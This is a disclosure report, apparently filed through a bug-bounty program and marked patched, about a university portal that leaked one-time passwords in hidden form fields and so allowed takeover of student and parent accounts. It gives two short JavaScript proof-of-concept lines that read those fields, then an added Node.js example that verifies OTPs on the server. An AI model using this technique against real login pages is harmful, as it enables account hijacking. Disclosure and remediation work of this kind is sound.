REPORT #1: Taking control over any account (both parent's & student's) via exposed OTP (One Time Password) pin on client's side (dms.jaipur.manipal.edu)
# Author : PIYUSH RAJ (0x48piraj)
# Impact : Taking control over any account (both parent's & student's) via exposed OTP (One Time Password) pin on client's side
# Vulnerability : Improper handling of sensitive data
# Target : dms.jaipur.manipal.edu
# Exploit : JavaScript Injection (Proof-of-Concept provided)
# Patched : Yes (Reported on https://bounty.jaipur.manipal.edu)
# Vulnerable parameters :
    - hdnOTP
    - hdnStudentOTP
# POC for each category :
    1. Hijacking Student's OTP :
        POC Code :
            alert("The Student's OTP is : " + document.getElementById("hdnStudentOTP").value);
    2. Hijacking Parent's OTP :
        POC Code :
            alert("The Parent's OTP is : " + document.getElementById("hdnOTP").value);
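The root cause reported above is that the OTP itself was present in the page, in the hidden fields hdnOTP and hdnStudentOTP. As an added example (not code from the original report or from the affected site), this Node.js code keeps the OTP on the server: only a keyed digest is stored, the form sent to the browser carries no OTP, and verification is server-side. The function names, the in-memory store, the 6-digit length, the 5-minute lifetime and the 5-attempt limit are assumptions.

```javascript
// Added example: the OTP never leaves the server except via SMS/e-mail.
const { createHmac, randomBytes, randomInt, timingSafeEqual } = require('node:crypto');

const OTP_TTL_MS = 5 * 60 * 1000;   // assumed lifetime
const MAX_ATTEMPTS = 5;             // assumed guess limit per OTP
const SERVER_KEY = randomBytes(32); // per-process key for the stored digests
const pending = new Map();          // sessionId -> { digest, expires, attempts }

// Keyed digest bound to the session, so a stored value is useless elsewhere.
function digestOf(sessionId, otp) {
  return createHmac('sha256', SERVER_KEY).update(`${sessionId}:${otp}`).digest();
}

// Returns two separate outputs: `otp` is handed only to the SMS/e-mail
// sender, `formHtml` is the only thing rendered to the browser.
function issueOtp(sessionId, now = Date.now()) {
  const otp = String(randomInt(0, 1000000)).padStart(6, '0');
  pending.set(sessionId, {
    digest: digestOf(sessionId, otp),
    expires: now + OTP_TTL_MS,
    attempts: 0,
  });
  // No hidden hdnOTP / hdnStudentOTP field: the page has nothing to read.
  const formHtml =
    '<form method="post"><input name="otp" autocomplete="one-time-code"></form>';
  return { otp, formHtml };
}

// The comparison happens on the server, in constant time, against the digest.
function verifyOtp(sessionId, submitted, now = Date.now()) {
  const entry = pending.get(sessionId);
  if (!entry) return false;
  if (now > entry.expires || entry.attempts >= MAX_ATTEMPTS) {
    pending.delete(sessionId); // expired or locked out: a new OTP is required
    return false;
  }
  entry.attempts += 1;
  const ok = timingSafeEqual(digestOf(sessionId, String(submitted)), entry.digest);
  if (ok) pending.delete(sessionId); // single use
  return ok;
}
```

In a multi-process deployment the `pending` map would live in a shared server-side session store rather than process memory.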